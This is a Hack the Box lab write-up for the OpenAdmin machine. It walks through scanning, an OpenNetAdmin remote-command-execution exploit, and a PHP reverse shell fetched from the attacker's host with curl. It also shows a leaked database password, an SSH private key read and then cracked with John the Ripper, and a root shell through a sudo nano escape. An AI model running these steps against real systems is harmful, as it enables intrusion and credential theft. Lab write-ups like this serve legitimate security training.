Hack the Box Writeup - OpenAdmin

Writeup for retired Hack the Box machine, OpenAdmin.

Hack the Box Writeup - OpenAdmin

Work and home life have been crazy busy recently so I haven't had any opportunities to sit down and spend some time hacking away, but with the UK being on lockdown at the moment, I find myself with more spare time than usual. The silver-lining being that I could dedicate some time to Hack the Box and owning a few more machines. This writeup is for the box "OpenAdmin".

Enumeration

Jumping straight into it, the first thing we do (as always) is run an nmap scan.

nmap -sC -sV -p- oA allports 10.10.10.171

Not much to show from this as the only ports open are SSH (22) and HTTP (80). Browsing to http://10.10.10.171 just shows us the the default Apache page so it's time to dig out some enumeration tools.

First up I tried gobuster:

gobuster dir -u http://10.10.10.171 -r -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txtlists
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.171
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/03/22 12:14:15 Starting gobuster
===============================================================
/music (Status: 200)
/artwork (Status: 200)
/sierra (Status: 200)
/server-status (Status: 403)
===============================================================
2020/03/22 12:19:27 Finished
===============================================================

Which resulted in a few sub-sites, which I spent some time browsing and reviewing but they revealed nothing of interest.

Strangely, running the same wordlist but using dirbuster finds us our way in! If someone can explain why Dirbuster finds this extra URL but Gobuster doesn't when using the exact same wordlist, then please let me know on Twitter @_deanwilliams.

The URL dirbusters finds is http://10.10.10.171/ona/ which gives us an open portal to an installation of OpenNetAdmin.

Remote Command Execution

The page also handily gives us the version number running, v18.1.1 - which a quick google reveals has a remote command execution vulnerability, found here.

Copying the bash script to our Kali machine, and running it immediately gives us the ability to run commands in a pretty good facsimile of an interactive shell.

We are, however, a very low privileged user with no access to any of the other user's home directories (or any flags) - and whilst this looks like an interactive shell, it isn't so we can't change directories etc. So the first thing to do is improve our access.

In order to do this, we copy php-reverse-shell.php to our directory, edit the IP address and port and then run a python http server.

sudo python3 -m http.server 80

Now using the RCE shell, we can run the following to download our shell to the webserver:

curl -o shell.php http://10.10.14.3/php-reverse-shell.php

Then simply run a netcat listener on the port you specified, and browse to http://10.10.10.171/ona/shell.php.

Further Enumeration

Now we can have a proper look around. A quick look at the /etc/passwd file shows us we have two normal user accounts, jimmy and joanna - not that that helps us much at the moment, but if we find any passwords we can try them on those accounts.

Digging into the OpenNetAdmin files soon finds us a useful configuration file, /opt/ona/local/database_settings.inc.php:

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

So let's try that password using the two user accounts we know of and try and ssh into the machine. And we get a result with jimmy - but Jimmy does not have a flag either, so now we need to find a way of getting into Joanna's account.

When enumerating files earlier, we had spotted another directory under /var/www called internal but www-data did not have access permissions - so lets start there.

The directory contans three PHP files, index.php, main.php, and logout.php. main.php contains something which looks very interesting:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

It seems if we can run it then it will print out Joanna's private SSH key, however, how do we access it? Let's take a look at the Apache2 configuration.

So this tells us that the internal site is running on localhost only on port 52846. So we can make use of curl and take a look.

Cracking the Key

A quick copy and paste of that key and we can try and ssh into the machine as joanna, but that is soon scuppered as the key is encrypted and asks for a password. John the Ripper to the rescue.

Firstly, copy ssh2john.py to your local directory, and run it:

python ssh2john.py joanna.key > joanna.hash

Then run John the Ripper on the produced hash file using the rockyou wordlist:

/usr/sbin/john joanna.hash -wordlist=/usr/share/wordlists/rockyou.txt

... which finds the password in short order!

Now we can ssh into the machine as joanna and get that first flag.

ssh -i joanna.key [email protected]

Privilege Escalation

Now to get root! Which turns out to be fairly straightforward. Checking the sudoers list shows that Joanna can run nano on the file /opt/priv without a password, which we can abuse to get a privileged shell.

sudo /bin/nano /opt/priv

Then once in nano hit <CTRL>R to read a file, followed by <CTRL>X to execute a command. When asked which command to execute, enter the following:

reset; sh 1>&0 2>&0

Which gives you an interactive root shell!

And there you have it. Quite a fun box overall. Onto the next one!